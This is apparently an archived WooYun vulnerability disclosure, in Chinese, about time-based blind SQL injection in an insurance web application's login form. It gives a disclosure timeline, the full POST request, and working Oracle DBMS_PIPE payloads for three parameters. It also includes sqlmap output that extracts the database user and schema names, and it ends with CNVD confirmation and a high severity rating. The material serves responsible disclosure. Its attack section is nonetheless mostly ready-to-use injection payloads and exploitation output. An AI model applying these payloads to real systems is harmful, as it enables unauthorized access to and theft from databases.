乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-04: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-07: 细节向实习白帽子公开 2016-01-18: 细节向公众公开
地址:
http://**.**.**.**:8088/SKLSUG/indexlis.jsp
时间盲注post包
POST /SKLSUG/fromLogin/fromLoginSave.jsp HTTP/1.1Host: **.**.**.**:8088User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://**.**.**.**:8088/SKLSUG/fromLogin/manageLogin.jspCookie: JSESSIONID=782FF9898F583F1E49892D45CE9E0088Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 91channel=I&usertype=1&managecom=00603&subcom=&supportcom=0060301&usercode=test&password=test
数据
Place: POSTParameter: usercode Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: channel=I&usertype=1&managecom=124124&subcom=&supportcom=1234134124&usercode=admin' AND 6285=DBMS_PIPE.RECEIVE_MESSAGE(CHR(112)||CHR(78)||CHR(68)||CHR(100),5) AND 'JBBc'='JBBc&password=adminPlace: POSTParameter: supportcom Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: channel=I&usertype=1&managecom=124124&subcom=&supportcom=1234134124' AND 7417=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(120)||CHR(122)||CHR(121),5) AND 'JCVP'='JCVP&usercode=admin&password=adminPlace: POSTParameter: usertype Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: channel=I&usertype=1' AND 8434=DBMS_PIPE.RECEIVE_MESSAGE(CHR(80)||CHR(75)||CHR(102)||CHR(87),5) AND 'NPme'='NPme&managecom=124124&subcom=&supportcom=1234134124&usercode=admin&password=admin---there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: usertype, type: Single quoted string (default)[1] place: POST, parameter: supportcom, type: Single quoted string[2] place: POST, parameter: usercode, type: Single quoted string[q] Quit>[11:52:26] [INFO] the back-end DBMS is Oracleback-end DBMS: Oracle[11:52:26] [INFO] fetching current user[11:52:26] [INFO] retrieved:[11:52:26] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based queriesSK[11:53:09] [INFO] adjusting time delay to 3 seconds due to good response timesL[11:53:21] [INFO] adjusting time delay to 2 seconds due to good response timesSUGPRODcurrent user: 'SKLSUGPROD'
available databases [1]:[*] SKLSUGPROD
20多个表 本来想跑用户的 结果太慢了 跑了一个多小时
[11:57:32] [INFO] adjusting time delay to 2 seconds due to20[11:57:37] [INFO] retrieved: CF[11:58:06] [INFO] retrieved: CTXSYS[11:59:35] [INFO] retrieved: DBS[12:00:25] [ERROR] invalid character detected. retrying..[12:00:25] [WARNING] increasing time delay to 3 seconds[12:00:46] [ERROR] invalid character detected. retrying..[12:00:46] [WARNING] increasing time delay to 4 seconds[12:01:03] [ERROR] invalid character detected. retrying..[12:01:03] [WARNING] increasing time delay to 5 secondsN[12:02:00] [ERROR] invalid character detected. retrying..[12:02:00] [WARNING] increasing time delay to 6 secondsM[12:02:46] [ERROR] invalid character detected. retrying..[12:02:46] [WARNING] increasing time delay to 7 seconds[12:03:09] [ERROR] unable to properly validate last characta[12:03:14] [INFO] retrieved: DMSYS[12:04:18] [INFO] retrieved: ECDEV[12:05:19] [INFO] retrieved:[12:05:30] [ERROR] invalid character detected. retrying..[12:05:30] [WARNING] increasing time delay to 3 seconds[12:05:45] [ERROR] invalid character detected. retrying..[12:05:45] [WARNING] increasing time delay to 4 seconds[12:06:03] [ERROR] invalid character detected. retrying..[12:06:03] [WARNING] increasing time delay to 5 secondsEXFSYS[12:08:42] [INFO] retrieved: MDS[12:10:11] [ERROR] invalid character detected. retrying..[12:10:11] [WARNING] increasing time delay to 6 secondsYS[12:11:10] [INFO] retrieved: OLAPSYS[12:14:22] [INFO] retrieved: ORDSYS[12:16:59] [INFO] retrieved: OUTLN[12:19:29] [INFO] retrieved: SCOT[12:21:43] [ERROR] invalid character detected. retrying..[12:21:43] [WARNING] increasing time delay to 7 secondsT[12:22:34] [INFO] retrieved: S[12:23:34] [ERROR] unable to properly validate last charactQLSU
才跑到这里
危害等级:高
漏洞Rank:10
确认时间:2015-12-08 12:38
CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.
暂无